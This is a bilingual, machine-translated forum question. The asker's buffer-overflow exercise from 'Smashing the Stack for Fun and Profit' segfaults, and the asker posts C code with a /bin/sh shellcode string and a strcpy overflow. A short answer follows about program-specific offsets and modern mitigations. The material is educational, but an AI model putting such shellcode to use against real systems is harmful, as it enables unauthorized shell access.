使用strcpy和缓冲区溢出执行shell代码
[英]Using strcpy & buffer overflow to execute shell code
问题描述
I've been going through "Smashing the stack for fun and profit" and am having issues executing shell code through a buffer overflow. 
我一直在经历“为乐趣和利益而粉碎堆栈”的过程,并且在通过缓冲区溢出执行shell代码时遇到了问题。
Running on Linux, Ubuntu 32bit via VirtualBox gcc compiler with -fno-stack-protector -ggdb -g tags 在Linux上运行,通过带有-fno-stack-protector -ggdb -g标签的VirtualBox gcc编译器的Ubuntu 32位
My code is identical to the reading and I don't understand why it's not working. 我的代码与阅读内容相同,我不明白为什么它不起作用。 I get a segmentation fault. 我遇到了细分错误。 When I use gbd to debug it says "0x08048268 in ??" 当我使用gbd进行调试时,它显示为“ 0x08048268 in?” which I know means it can't find the address in the scope. 我知道这意味着它无法在范围内找到地址。 I don't understand why it shouldn't be able to. 我不明白为什么它不应该这样做。
I am compiling with stack guard off as well. 我也在关闭堆栈保护功能。
char shellcode[] = "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
char large_string[128];
void main() {
char buffer[96];
int i;
long *long_ptr = (long *) large_string;
for (i = 0; i < 32; i++)
*(long_ptr + i) = (int) buffer;
for (i = 0; i < strlen(shellcode); i++)
large_string[i] = shellcode[i];
large_string[127] = '\0';
strcpy(buffer,large_string);
}
1 个解决方案
解决方案1
2 2015-09-24 07:20:05
That's an old article, but I've cited it too. 那是一篇老文章,但我也引用了它。 The problem is that your code is “identical to the reading.” Those aren't magic numbers from a script. 问题在于您的代码“与阅读相同”。这些不是脚本中的魔术数字。 Pay close attention to how Aleph One determined which values to smash the stack with for that program. 请密切注意Aleph One 如何确定该程序使用哪个值来粉碎堆栈。
And keep in mind that the article is from 1996, and the kernel and GCC devs have read it too. 并且请记住,这篇文章来自1996年,内核和GCC开发人员也已阅读。
声明:本站的技术帖子网页,遵循CC BY-SA 4.0协议,如果您需要转载,请注明本站网址或者原文地址。任何问题请咨询:yoyou2525@163.com.